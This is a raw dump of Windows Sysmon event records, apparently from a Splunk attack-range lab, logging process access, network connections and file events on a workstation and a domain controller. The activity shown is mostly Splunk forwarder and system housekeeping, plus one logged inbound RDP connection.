07:50:28.013{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807262Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:50:28.013{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807261Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:28.013{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807260Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:28.013{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F444-60EB-6B79-00000000D001}2696C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807259Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:28.013{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F444-60EB-6B79-00000000D001}2696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807258Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:28.000{0C1E0330-F444-60EB-6B79-00000000D001}2696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001048009Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:21.710{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51000-false10.0.1.12-8000- 23542300x80000000000000001048008Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:29.186{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88B471820ED4EE707A00799E9A805CE8,SHA256=09F845C9C33489AB534A14EB99788F6ACF0D267D31BD2CBE7AF30601D507E196,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807273Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:28.997{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C59883B1B7FD301FB08EE81A3B4ABB8,SHA256=3211B551F4F0B57D2AB410412318CABE6FBA89FE428EFC0B5E2E51CF60F17E09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807272Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:28.997{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=378E72CB2BD294240CCA1886D75710D3,SHA256=A82BEDD0B87992A7E04072A8ABF05912553FE08A09CE8724360D110FDE63859D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048010Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:30.204{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75D6CC267F01B4ADF2FB1DAA99FCBFA3,SHA256=1FC7AD1781D51C3E42CC5143B8A36E91AF5279E07094D0237586B9CEC80F82CF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807276Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:29.208{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57241-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807275Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:30.075{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=A6AFBFF79460CD593D48293C6D0A882D,SHA256=9106757869B1D3D07E8307942F8DF051644E924DCD5DDEB1C49F479BB0A2550C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807274Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:30.013{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D998E6C5B963F63AA11D8928DEEF733F,SHA256=EA7B249B0483F0BFC85C3B650BB63CF8472D7EF646327AD5CF79077FF9CD141C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048011Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:31.219{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29F3F927D18AFDF1C1D897BC48B0008B,SHA256=FB798AFA0E0BE175F7A59344BC6F562C9D9A8461C4BDE373023F5427B7B22671,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807277Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:31.044{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB28D8A3C2D731C04F749842F2B38561,SHA256=85BA630C078E58F568E7EE88779022EC3CD2C36312813E1582CF9592CDD0F183,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048012Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:32.219{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42F127F2AF1EFC708D278744433BD97C,SHA256=D0CFB2F3A7FC0F2CC376DC6A14B9DBE6A4707276471BA8E76A6A74B83F200384,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807278Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:32.075{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90482ABA7A446BCCAF8F50CF4A886F46,SHA256=857AC1DCE07BA0B6C5B5B02F3432EB570BEFA931DCB72B3A347E7BFB961F285E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807279Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:33.122{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=076E33FCE5AAF58F939D8C7009A3D559,SHA256=070A9543346D7084E52F31584489B3DF525D9021C1FD80A538A1397E285FAC4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048015Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:33.604{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F34468D43B681C5D2673680BC5AAF85C,SHA256=34105B235A84E5A12A4261DB205008867BA77D582159CB0B5DCC10D5A5D290E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048014Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:33.604{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7A7B4F8ADF72ECEDB6D0BCD4318509E9,SHA256=6238318A3A91D0799E84E7F08899BAF2665DFD3CDD8EF0A42F65B118354B93F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048013Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:50:33.235{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8535836C4E5AC9A35A825916AAA4757C,SHA256=93FB46626D023B21DB43098A423C3412B4AEC52D4220ACA985230B5CF0B5DCAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807280Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:34.158{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEFD354E5670710E9C4F49DAAFC059AB,SHA256=9B47BA1FDC79DA72B362AE0E600BAE7120995BEA831C0E61A39FFB42B83C97DF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048017Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:25.863{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse195.242.110.130amahgoob33.ptr1.ru64726-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001048016Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:34.235{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6E92775AD655510929F748DFBCE1FD4,SHA256=4E955D43D9F406B87B071F6CB795FA39FC9303F4BA36CA05878D9B1838FBE96A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807282Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:34.306{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57242-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807281Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:35.158{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B11E4901EE2009BC2E8D2D57BA2ED468,SHA256=9A416508A75CFB529892160F643B82E3F58DA753DA3E7530DD6582AA847450E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048018Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:35.250{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FA2412384AD8FF79D3A05BFCEFBE025,SHA256=AB37EE798044B91E3499E607B6B6309217BDF3803E733BC2266E01914351F11D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048020Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:27.728{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51001-false10.0.1.12-8000- 23542300x80000000000000001048019Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:36.265{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA768C392A73D8B8D3ADDAE66F5FCECB,SHA256=624AB5A8B5F9159A04F13D10DCE3DF29A668C580B932063AF30AD9B35561FE3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807283Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:36.158{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9F18D152A7C0DFBC24C6F1D9D12DBB9,SHA256=09A52E1F18920CD11CB8FFEE905A9A4D9C1329927413A9FC463F49F135504B7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048021Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:37.301{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6CE43B59473A3EC90BB4672EF41ADAE,SHA256=7743FEC5F1845FAE3BB8202A58AB102D308F10A2B35C61698BB98D1ED6517462,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807284Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:37.158{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E68EF49E56E3F7F868A09E39599E33A0,SHA256=401DD29908BF727FCA81306EB30BE9CF47C695D9DD19A9FD067744DFFB50EE97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807285Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:38.205{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED2A260EAA887B28D25174EC239F6F6C,SHA256=013DB63302103E98888F79A7FA94E3A74EDAADED2BEF90DB3E034E9CA1517939,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048023Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:38.516{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=76484322985778F0D53DB2F6C5843CEE,SHA256=5FF565771C4A7564D2B8801853CD7EAA40EF7B381EB8A203BE0CB1006C496D97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048022Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:38.316{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60C4176EC0DB081FD75A58FD56867500,SHA256=6DAC06B6F82DA04A06CBC154129E9DE4B367D835DAC9D3CCB8E3B066DDE23DCB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807286Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:39.236{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0527DB45881D032F07A20FEAC79E385,SHA256=301D4BA869B7CEF7BED33EAF571E90488F2300F666F86B24330481E9CEF8B9A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048035Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:50:39.984{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=3C08B78F04297E6F10B389E1CD4BB5A5,SHA256=0C9A4CD3A3D0299C9EAA0093D3E918DCB25121B91EB581E7F396B3859C65E842,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048034Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:39.984{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C859C64E71F69E86541B26132A502173,SHA256=D61DFDC717EEA0DAF090FE5DF2C3C9A2A63FB7853430C0A2D0B144953E879272,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048033Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:39.984{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=FFEBAA72DFE64CCD37D65CD0C6A0FF14,SHA256=9EAC8ED5DE6DCFD7F7D5A7A6B43E77D62FC4453F59933DEFB6DF781A8505E9A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048032Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:39.984{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=53DE5A19EFC06FE1D1011B2A2215AFB0,SHA256=B079EEE3303A6F424104FD842A2A2CF9306A19E5D0E1B4FFB8CFCEF39A8DA6D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048031Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:50:39.984{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=60A2BBDF3B77E5D844F49080356E7210,SHA256=A41AA8D02895E173ACEDA9F10FE2A511646DD368C7F07D32ADAD4488D2751059,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048030Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:39.984{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C717FBC36A17CE6109CF01C3BF548FAA,SHA256=F23AB9A811F460C76957A393F7D3DB77B8A1DFE0419A11E77F8B291FAE9118EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048029Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:39.984{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=BD4A0470CCBC3D99EF9088216ABF5D06,SHA256=2DACBF0275EB2117AA29BA24A327767BF1E9F315E0EA0C93CD3A33F1982D47C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048028Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:39.983{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=DACA33C307A371BB0922FFC9339952E3,SHA256=BC5EC74605CFFC864B130C0F79FF91BF8B05BAB8BD4FEB8077185BF70149B24D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048027Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:50:39.981{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=DC524684E4FE5CF311F229293F8CBD4C,SHA256=5CF46EFAA9689148149610D9E92B84A122DCDD9B75981361E8F72D2C73F4A6BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048026Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:39.980{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=912A3B4007D19B4CB4553DA2EAECF077,SHA256=31E83F5A04D712283B77FB96F486B62F14922EFF672C0E06E2AFC5BAC80E1474,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048025Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:39.979{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 